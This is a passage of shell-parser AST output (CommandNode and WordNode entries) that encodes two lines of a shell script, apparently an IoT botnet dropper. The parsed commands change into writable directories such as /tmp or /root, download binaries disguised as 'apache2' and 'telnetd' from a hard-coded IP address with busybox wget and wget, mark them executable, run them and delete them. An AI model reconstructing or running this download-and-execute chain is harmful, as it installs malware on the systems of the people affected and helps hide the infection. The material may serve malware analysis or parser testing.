    WordNode(lineno=13, pos=(1823, 1849), word='http://208.67.1.13/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1849, 1850)),
  CommandNode(lineno=13, pos=(1851, 1882), parts=[
    WordNode(lineno=13, pos=(1851, 1855), word='wget'),
    WordNode(lineno=13, pos=(1856, 1882), word='http://208.67.1.13/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1882, 1883)),
  CommandNode(lineno=13, pos=(1884, 1900), parts=[
    WordNode(lineno=13, pos=(1884, 1889), word='chmod'),
    WordNode(lineno=13, pos=(1890, 1892), word='+x'),
    WordNode(lineno=13, pos=(1893, 1900), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1900, 1901)),
  CommandNode(lineno=13, pos=(1902, 1911), parts=[
    WordNode(lineno=13, pos=(1902, 1911), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1911, 1912)),
  CommandNode(lineno=13, pos=(1913, 1927), parts=[
    WordNode(lineno=13, pos=(1913, 1915), word='rm'),
    WordNode(lineno=13, pos=(1916, 1919), word='-rf'),
    WordNode(lineno=13, pos=(1920, 1927), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1928, 2100), parts=[
  CommandNode(lineno=14, pos=(1928, 1935), parts=[
    WordNode(lineno=14, pos=(1928, 1930), word='cd'),
    WordNode(lineno=14, pos=(1931, 1935), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1936, 1938)),
  CommandNode(lineno=14, pos=(1939, 1950), parts=[
    WordNode(lineno=14, pos=(1939, 1941), word='cd'),
    WordNode(lineno=14, pos=(1942, 1950), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1951, 1953)),
  CommandNode(lineno=14, pos=(1954, 1961), parts=[
    WordNode(lineno=14, pos=(1954, 1956), word='cd'),
    WordNode(lineno=14, pos=(1957, 1961), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1962, 1964)),
  CommandNode(lineno=14, pos=(1965, 1973), parts=[
    WordNode(lineno=14, pos=(1965, 1967), word='cd'),
    WordNode(lineno=14, pos=(1968, 1973), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1974, 1976)),
  CommandNode(lineno=14, pos=(1977, 1981), parts=[
    WordNode(lineno=14, pos=(1977, 1979), word='cd'),
    WordNode(lineno=14, pos=(1980, 1981), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1981, 1982)),
  CommandNode(lineno=14, pos=(1983, 2022), parts=[
    WordNode(lineno=14, pos=(1983, 1990), word='busybox'),
    WordNode(lineno=14, pos=(1991, 1995), word='wget'),
    WordNode(lineno=14, pos=(1996, 2022), word='http://208.67.1.13/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2022, 2023)),
  CommandNode(lineno=14, pos=(2024, 2055), parts=[
    WordNode(lineno=14, pos=(2024, 2028), word='wget'),
    WordNode(lineno=14, pos=(2029, 2055), word='http://208.67.1.13/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2055, 2056)),
  CommandNode(lineno=14, pos=(2057, 2073), parts=[
    WordNode(lineno=14, pos=(2057, 2062), word='chmod'),
    WordNode(lineno=14, pos=(2063, 2065), word='+x'),
    WordNode(lineno=14, pos=(2066, 2073), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2073, 2074)),
  CommandNode(lineno=14, pos=(2075, 2084), parts=[
    WordNode(lineno=14, pos=(2075, 2084), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2084, 2085)),
  CommandNode(lineno=14, pos=(2086, 2100), parts=[
    WordNode(lineno=14, pos=(2086, 2088), word='rm'),
    WordNode(lineno=14, pos=(2089, 2092), word='-rf'),
    WordNode(lineno=14, pos=(2093, 2100), word='telnetd'),
  ]),
])
